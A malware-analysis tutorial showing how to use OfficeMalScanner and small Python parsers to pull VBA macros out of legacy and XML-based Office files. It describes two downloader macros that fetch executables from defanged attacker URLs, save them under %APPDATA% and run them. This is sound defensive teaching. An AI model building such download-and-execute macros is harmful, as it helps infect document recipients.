Spreading malware through malicious documents is not new, but the variety of techniques malware authors use makes it challenging for analysts to identify patterns and to extract and understand the malicious code. In this article series, we will learn about the two primary document types through which malicious documents spread: Microsoft Office documents and PDF files. We will first look at the structure of these documents, because that is what reveals which properties and artifacts malware authors use to embed their code. We will also look at tools that can extract this information and at how to interpret their output. So, let’s start.

First, let’s analyze Microsoft Office documents.

Microsoft Office Applications

Microsoft Office applications such as Word, Excel, and PowerPoint have a long history of being exploited by malware authors. Because these applications are widely used by both enterprise users and end users, malware authors target their documents to infect more users and extract valuable information from them.

Malware authors exploit these applications in one of two ways: by embedding shellcode in the document, which is executed by exploiting a vulnerability, or by embedding macro code in the document, which is executed when the user clicks ‘OK’ to allow it.

Note that although all modern versions of Microsoft Office support VBA macros, macros are disabled by default and the user must explicitly enable them. In other words, this type of attack needs the user’s involvement to succeed. Malware authors will hide the contents of a document until the user clicks “Enable Content.” As soon as the user clicks “Enable Content,” they might see some familiar information in the document, but if the document is malicious, the malicious code starts running in the background.

A very popular toolkit for analyzing such malicious documents is OfficeMalScanner. It is a great utility because it removes the dependency on having Microsoft Office installed on the analysis system. In the section below, we will see how to use OfficeMalScanner to analyze such documents.

OfficeMalScanner extracts the VBA code embedded in the macro. Supply the info parameter as follows:

OfficeMalScanner sample.doc info

OfficeMalScanner then creates a directory and dumps its findings into that directory.

In this example, it dumps the parsed contents of sample.doc into <filename>.macros.

Open the extracted Avira file to view the macro code.

As soon as the document is opened and the user enables macros, Auto_Open() is executed. This function calls OberonSoftware, which in turn calls the function Mordedor. The declaration at the top of the script shows that Mordedor is an alias for URLDownloadToFileA, which means that the code directs Microsoft Word to download the file aboki.scr from hxxp://limitless.hints.me and save it as %APPDATA%\conhost.exe.
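The manual reading described above (find the auto-run entry point, then resolve aliased API names) can be sketched in Python. This is only a minimal illustration: the function names, the list of auto-run procedure names, and the SAMPLE text are assumptions made for the example, and SAMPLE is a hypothetical reconstruction, not the actual macro from the sample.

```python
import re

# Procedure names that Office runs automatically once macros are enabled.
# Illustrative list only, not exhaustive.
AUTO_EXEC_NAMES = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open")

# Matches VBA Declare statements that bind a local name to a DLL export, e.g.
#   Declare Function Foo Lib "urlmon" Alias "URLDownloadToFileA" (...)
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+'
    r'Lib\s+"([^"]+)"\s+Alias\s+"([^"]+)"',
    re.IGNORECASE,
)


def find_api_aliases(vba_source):
    """Map each aliased local name to (library, real exported function)."""
    return {
        match.group(1): (match.group(2), match.group(3))
        for match in DECLARE_RE.finditer(vba_source)
    }


def find_auto_exec(vba_source):
    """Return the auto-run procedure names that the source defines."""
    found = []
    for name in AUTO_EXEC_NAMES:
        pattern = r'\bSub\s+' + re.escape(name) + r'\s*\('
        if re.search(pattern, vba_source, re.IGNORECASE):
            found.append(name)
    return found


# Hypothetical macro text shaped like the one discussed in the article.
SAMPLE = '''
Private Declare Function Mordedor Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal a As Long, ByVal b As String, ByVal c As String, _
     ByVal d As Long, ByVal e As Long) As Long

Sub Auto_Open()
    OberonSoftware
End Sub
'''

if __name__ == "__main__":
    print(find_auto_exec(SAMPLE))
    print(find_api_aliases(SAMPLE))
```

A script like this only flags where to look; the call chain between the entry point and the aliased API still has to be read by hand.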

As we can see, with just one OfficeMalScanner command we were able to extract the macros and recover the useful information discussed above. We will see more of OfficeMalScanner’s capabilities and limitations as we progress in this series.

Starting with Office 2007, Microsoft shifted from the traditional binary format to an XML-based format for better parsing of embedded objects. This is why the newer Microsoft Office extensions end in x, such as .docx, .pptx, and .xlsx. These files are ZIP archives, so all of their contents can be extracted using software like 7-Zip. For example, extracting the content of this document using 7-Zip produces a folder containing its individual parts.
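Because the XML-based formats are ZIP archives, the same listing that 7-Zip gives can be produced with Python's standard zipfile module. The sketch below is a minimal illustration; parts_by_folder and build_demo_archive are hypothetical names, and the in-memory archive is only a stand-in for a real document so that the example runs without a sample file.

```python
import io
import zipfile


def parts_by_folder(path_or_file):
    """Group the parts of a ZIP-based Office document by their folder."""
    folders = {}
    with zipfile.ZipFile(path_or_file) as archive:
        for name in archive.namelist():
            # "word/document.xml" -> folder "word", leaf "document.xml";
            # top-level parts end up under the empty folder name "".
            folder, _, leaf = name.rpartition("/")
            folders.setdefault(folder, []).append(leaf)
    return folders


def build_demo_archive():
    """Build a tiny in-memory stand-in for a macro-enabled document."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
        archive.writestr("word/vbaProject.bin", b"placeholder")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    for folder, leaves in parts_by_folder(build_demo_archive()).items():
        print(folder or "(root)", leaves)
```

For a real file, pass its path instead of the in-memory buffer, for example parts_by_folder("sample.docx").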

Now let’s run these new XML-based Word documents through OfficeMalScanner. Before we start, another important point to note is that in the XML-based formats, macros are supported only in files whose extension ends in m, such as .docm and .pptm.


To analyze a sample in this format, we took newformatsample.docm and ran the following command:

OfficeMalScanner newformatsample.docm info

We got the above message because OfficeMalScanner cannot use the ‘info’ parameter on these new XML-based formats. Thus, use the info parameter only with legacy files.

To get around this limitation of the ‘info’ command, we can use another OfficeMalScanner command, inflate, as shown below:

OfficeMalScanner newformatsample.docm inflate


If OfficeMalScanner detects embedded VBA macro code, it places the contents in vbaProject.bin. Below is the directory structure of the whole inflate command output.

Note that vbaProject.bin is inside the word folder.
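As a cross-check that does not depend on OfficeMalScanner, the macro container can also be pulled out of the archive directly. The following is a rough sketch using Python's zipfile module; extract_vba_project and build_fake_docm are hypothetical names, and the fake document holds placeholder bytes rather than a real VBA project.

```python
import io
import zipfile


def extract_vba_project(docm):
    """Return (part_name, raw_bytes) for the first vbaProject.bin, or None."""
    with zipfile.ZipFile(docm) as archive:
        for name in archive.namelist():
            # In Word documents the part normally sits in the word folder.
            if name.lower().endswith("vbaproject.bin"):
                return name, archive.read(name)
    return None


def build_fake_docm(with_macro=True):
    """Build an in-memory stand-in for a .docm so the sketch runs anywhere."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            archive.writestr("word/vbaProject.bin", b"placeholder bytes")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    found = extract_vba_project(build_fake_docm())
    if found is None:
        print("no VBA project found")
    else:
        name, data = found
        print(name, len(data), "bytes")
```

With a real sample, the returned bytes could be written to disk as vbaProject.bin and then examined with the tool of choice.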

Now let’s run the ‘info’ command on this vbaProject.bin file.

OfficeMalScanner vbaProject.bin info

Now the command works, because vbaProject.bin is a legacy-style binary file that the info parameter can parse.
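Which parameter applies can be guessed from the first bytes of a file: legacy Office binaries (and vbaProject.bin) begin with the OLE2 compound-file signature, while the XML-based formats begin with the ZIP local-file signature. The sketch below is an illustration under that assumption; container_type and suggested_mode are hypothetical helper names, and the mapping to OfficeMalScanner parameters simply mirrors the behaviour described in this article.

```python
# Signature of OLE2 compound files (legacy .doc/.xls/.ppt, vbaProject.bin).
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
# Signature of a ZIP local file header (.docx/.docm/.xlsx/.pptx and so on).
ZIP_MAGIC = b"PK\x03\x04"


def container_type(header):
    """Classify a file by its leading bytes: 'ole2', 'zip', or 'unknown'."""
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    if header.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def suggested_mode(header):
    """Suggest the OfficeMalScanner parameter discussed in the article."""
    return {"ole2": "info", "zip": "inflate"}.get(container_type(header))


def read_header(path, size=8):
    """Read the first few bytes of a file on disk."""
    with open(path, "rb") as handle:
        return handle.read(size)


if __name__ == "__main__":
    print(suggested_mode(OLE2_MAGIC + b"\x00" * 8))
    print(suggested_mode(ZIP_MAGIC + b"\x14\x00"))
```

For a file on disk, suggested_mode(read_header("vbaProject.bin")) would be the typical call; a result of None means the file is neither container type.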

Below are the contents of the extracted macro file.

Let’s open NewMacros and look at its functionality. As soon as the document is opened and macros are enabled, function ‘h’ is called (look inside Auto_Open). Inside function ‘h,’ a shell-type object is created, and an XMLHTTP object is then used to send a GET request that downloads the content from hxxp:/softonic.biz/cr/20014.exe.

The downloaded exe file is then saved as q.com (in the snippet below) in the %APPDATA%\q folder (in the snippet above).

After that, function ‘m’ is called, which in turn executes the downloaded file.
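When noting down indicators such as the download URL, it is common to defang them (http becomes hxxp) so they cannot be clicked by accident, as this article does. A small Python sketch of pulling URLs out of macro text and defanging them follows; the helper names and the sample line are assumptions for illustration, and the sample uses a reserved .invalid host rather than the real address.

```python
import re

# Matches live (http/https) and already defanged (hxxp/hxxps) URLs.
URL_RE = re.compile(r'\b(?:https?|hxxps?)://[^\s"\'<>]+', re.IGNORECASE)


def defang(url):
    """Rewrite a leading http/https scheme to hxxp/hxxps."""
    return re.sub(r'^http', 'hxxp', url, flags=re.IGNORECASE)


def extract_urls(vba_source):
    """Return the unique URLs found in macro text, defanged, in order."""
    seen = []
    for match in URL_RE.finditer(vba_source):
        url = defang(match.group(0))
        if url not in seen:
            seen.append(url)
    return seen


# Hypothetical macro line shaped like an XMLHTTP download call.
SAMPLE_LINE = 'req.Open "GET", "http://example.invalid/cr/payload.exe", False'

if __name__ == "__main__":
    print(extract_urls(SAMPLE_LINE))
```

Macros often build URLs from concatenated or obfuscated strings, so a plain pattern match like this is a starting point only and will miss such cases.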

In this article, we have covered some basic concepts for analyzing malicious files. In the next part of the series, we will look at more complex examples and at methods for parsing the contents of those malicious documents.